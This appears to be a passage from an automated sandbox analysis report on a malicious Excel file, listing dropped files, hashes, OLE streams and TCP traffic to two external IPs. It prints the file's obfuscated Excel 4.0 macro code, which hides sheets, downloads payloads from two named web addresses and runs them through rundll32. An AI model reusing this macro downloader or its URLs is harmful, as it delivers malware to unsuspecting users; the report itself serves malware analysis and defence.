Entropy (8bit):	6.311775051607851
Encrypted:	false
SSDEEP:	1536:ilqXley2pR737/99UF210gNucQodv+1//dMrYJntYyjCQx7s2t6OGP:iQXipR7O/gNuc/v+lXjCQ7sO0
MD5:	E4731F8A3E7352DBA44EC7D3DD15BAEA
SHA1:	D5CA0025FBD356DEB8EDE35001F93039625562A5
SHA-256:	6C78EF77ACEF978321CCD30EE126FB7D30285BC186DDBDBE8B3E8F6E69D01353
SHA-512:	E68BA11A73E28404A274F0EE4ECC97A8BEFEDB91A20BDC5B00C72AE8928DD63924E351BE8A88E40960D54CE07E21EA21710DB0DFA00A5558C4264490E27B6988
Malicious:	false
Preview:	0..l....H.........l.0..l....1.0...`.H.e......0..\...+.....7.....\.0..\.0...+.....7........_.T.....210611210413Z0...+......0..\.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun May 30 23:40:37 2021, atime=Sun May 30 23:40:37 2021, length=16384, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.47188861989318
Encrypted:	false
SSDEEP:	12:85QapSLgXg/XAlCPCHaXgzB8IB/YOUpvX+Wnicvb483+bDtZ3YilMMEpxRljKMTg:85BW/XTwz6I+OeYe7CDv3qBrNru/
MD5:	F6CB0636A61B6677DB175EAB2729313C
SHA1:	CD6C7366FEE018D85A9E30EFE4C3C07C78D1F7D0
SHA-256:	C22D9BCFD7B727AB047457EF656C6D998921191BAA002702A3131D31CC6F811E
SHA-512:	5A65C2E0258F6328C477D340D1022F93C6256B4241E53AD47C1432087758C139E6839EEDA7A0E7A2C0EA5A265F6D4B21BCA3BB3F1A88114066B209D87A6D6221
Malicious:	false
Preview:	L..................F...........7G...3t.Hm...3t.Hm...@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\927537\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......927537..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	113
Entropy (8bit):	4.71317481637129
Encrypted:	false
SSDEEP:	3:oyBVomMnUTWeS4UOytUTWeS4UmMnUTWeS4Uv:dj6nUTL8tUTLinUTLK
MD5:	827572951026F0F9437E31D866B8FF08
SHA1:	0B6A363D618B5E1D031EE6E5DCE5C18A9B13BBE6
SHA-256:	493A258224290D5C5BB92DC4C57E3B8E36D4BE213CC9F3744D69D345F03B843B
SHA-512:	F224FE824B181BEA88A282AFDD4528CF59F8952BD571C595AC6E6E3F2E7E9FA499B9E8FC5DE623B02501C0D341A82B3A7053B7550746CA36CDC6EBF1FBA662DB
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..statistic-1496367785.LNK=0..statistic-1496367785.LNK=0..[xls]..statistic-1496367785.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-1496367785.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Sun May 30 23:40:37 2021, atime=Sun May 30 23:40:37 2021, length=173056, window=hide
Category:	dropped
Size (bytes):	2128
Entropy (8bit):	4.526584572036177
Encrypted:	false
SSDEEP:	48:8tl/XT3IkdPWf2BQh2tl/XT3IkdPWf2BQ/:8r/XLIkVWf2BQh2r/XLIkVWf2BQ/
MD5:	EAE54A6709DFE2966EF10CC1E73A3345
SHA1:	3EB62EF39E7F1925E6AED8B9197596770CF6ADD1
SHA-256:	367542B6A9E110DD6525E6A474419B03BB4F9C790655EEF1A755110759F0EBD7
SHA-512:	BA3A506FA4B1271C9CC1BCE225AEB95D445227A4271EC300A2456A261A680BC69BF6AC2539C2EBAAF124390D666D7CC831322F000E787467E5AE77FEE2F0D09D
Malicious:	false
Preview:	L..................F.... ....I<..{...3t.Hm...>..Hm...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2......R.. .STATIS~1.XLS..^.......Q.y.Q.y...8.....................s.t.a.t.i.s.t.i.c.-.1.4.9.6.3.6.7.7.8.5...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\927537\Users.user\Desktop\statistic-1496367785.xls./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.a.t.i.s.t.i.c.-.1.4.9.6.3.6.7.7.8.5...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......927537..........D_..

C:\Users\user\Desktop\7BCE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	199869
Entropy (8bit):	5.724666600105969
Encrypted:	false
SSDEEP:	6144:d8rmdAIByzElbSRg3WCbgBeP5NmPTdmsizCEadEudQ6KL8rmdAIByzElbSRg3WCX:cLEadnd+h
MD5:	7CEED140B26A2DDA4FCB7BD954F211CF
SHA1:	4D2AF9F747412365FBB0CB4C235AD669C67006A9
SHA-256:	7C074CAFC1D4A9E6EE817FDB3FBB247D0506EBD57D9FAE98A208A963F3BE1F5E
SHA-512:	FBC90CC3979309D02AE544AECDBAD10B5BA00FA920EA854CF03A1E36CC4A3A674418CD5DA0F551B7922FBE95D0D8B08881B02F764DAB7E15B359708985800CFA
Malicious:	false
Preview:	........g2..........................\.p....user B.....a.........=...............................................=........K..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: van-van, Last Saved By: Grog, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri May 21 09:07:02 2021, Security: 0
Entropy (8bit):	2.0857713013138395
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	statistic-1496367785.xls
File size:	536064
MD5:	7fb48e03b899f792be6c3118a46c5c8f
SHA1:	55445d13cd433121c6c2bfb31414b08e31e28a65
SHA256:	1c818433e1ca49729f987b3f060b2133c8375f8164181c4684600a278ee6033f
SHA512:	e950fe3278277996dbfb9f7f80bd03976793ba4967f272612f901eea83e1284a512104348ab14d3028dcac0ef9cd527dde9ce22323c90fa080fae3fcdc79905f
SSDEEP:	6144:C6tIrWqrY5O3NMHGRYc9u/YRTP85XbDu1XYiXxy:Ru1XPE
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "statistic-1496367785.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Code Page:	1251
Author:	van-van
Last Saved By:	Grog
Create Time:	2015-06-05 18:17:20
Last Saved Time:	2021-05-21 08:07:02
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.298297266065
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . E x c e l 4 . 0 M a c r o s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.277521975637
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . G r o g . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . . G . N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 521856

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	521856
Entropy:	2.01072652781
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . G r o g B . . . . . . . . . . . . . . . . . . . . . . . D o c 4 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
Data Raw:	09 08 08 00 00 05 05 00 0a 54 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 04 47 72 6f 67 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

,,,"=WORKBOOK.HIDE(""Doc2"",1)",,,,,,"=WORKBOOK.HIDE(""Doc3"",1)",,,,,,"=WORKBOOK.HIDE(""Doc4"",1)",,,=BA17(),,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL29&Doc2!BL30,Doc3!AY10)=RAND()=FACT(59)=FORMULA(Doc2!BJ39&before.4.4.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY13&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW10)=SUMXMY2(452354,45245)",,,,,,"=FORMULA(Doc2!BJ39&before.4.4.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY14&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&""1""&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW11)",,,,,,=GOTO(Doc3!AW8),,,"=FORMULA(""=""&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW14)",,,,,,"=FORMULA(""=""&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&""1""&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW15)",,,,,,,,,,,,=BD4(),,,,,,,,,,,,,,,,,,,,,CALL,,,"=FORMULA(Doc2!BH20&Doc2!BI20&Doc2!BJ20&Doc2!BK20,Doc3!AY13)",,,,,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL32&Doc2!BJ31&Doc2!BL31&Doc2!BL34&Doc2!BJ32&""e""&""A"",Doc3!AY11)",,,,,,,,,,,,"=FORMULA(Doc2!BH21&Doc2!BI21&Doc2!BJ21&Doc2!BK21,Doc3!AY14)",,,,,,,,,,,,"=FORMULA(Doc2!BM34&Doc2!BM29&Doc2!BM30&Doc2!BM33,Doc3!AY12)",,,,,,=BG8(),,,,,,

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,psq.com.mx/hDHqOp5,8UBQv/filter.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,academy.haleemcampus.co,m/GxaCS5azoZlJ/filter.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\flamo.vir,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXEC,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\bubl.cmi,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",,,,,,B,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,J,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,un,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",Dl",,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,lRegi,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ster,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Server,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 29, 2021 17:40:32.109601021 CEST	49165	443	192.168.2.22	162.241.2.112
Jun 29, 2021 17:40:32.272084951 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:32.272279978 CEST	49165	443	192.168.2.22	162.241.2.112
Jun 29, 2021 17:40:32.281557083 CEST	49165	443	192.168.2.22	162.241.2.112
Jun 29, 2021 17:40:32.451637030 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:32.464067936 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:32.464092016 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:32.464103937 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:32.464221954 CEST	49165	443	192.168.2.22	162.241.2.112
Jun 29, 2021 17:40:32.512999058 CEST	49165	443	192.168.2.22	162.241.2.112
Jun 29, 2021 17:40:32.713113070 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:32.713346958 CEST	49165	443	192.168.2.22	162.241.2.112
Jun 29, 2021 17:40:34.069192886 CEST	49165	443	192.168.2.22	162.241.2.112
Jun 29, 2021 17:40:34.271677017 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:35.198796034 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:35.198834896 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:35.198848009 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:35.198872089 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:35.198888063 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:35.198930979 CEST	49165	443	192.168.2.22	162.241.2.112
Jun 29, 2021 17:40:35.198967934 CEST	49165	443	192.168.2.22	162.241.2.112
Jun 29, 2021 17:40:35.199198961 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:35.199251890 CEST	49165	443	192.168.2.22	162.241.2.112
Jun 29, 2021 17:40:35.200234890 CEST	49165	443	192.168.2.22	162.241.2.112
Jun 29, 2021 17:40:35.361346960 CEST	443	49165	162.241.2.112	192.168.2.22
Jun 29, 2021 17:40:35.397497892 CEST	49168	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:35.559286118 CEST	443	49168	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:35.559483051 CEST	49168	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:35.560208082 CEST	49168	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:35.721808910 CEST	443	49168	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:35.722783089 CEST	443	49168	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:35.722816944 CEST	443	49168	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:35.722843885 CEST	443	49168	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:35.722858906 CEST	443	49168	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:35.722930908 CEST	49168	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:35.722956896 CEST	49168	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:35.729106903 CEST	443	49168	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:35.729341030 CEST	49168	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:35.760533094 CEST	49168	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:35.927985907 CEST	443	49168	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:35.928103924 CEST	49168	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:36.528536081 CEST	49168	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:36.731374979 CEST	443	49168	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:37.117383957 CEST	443	49168	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:37.117415905 CEST	443	49168	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:37.117592096 CEST	49168	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:37.118180990 CEST	49168	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:37.120270014 CEST	49170	443	192.168.2.22	108.179.232.80
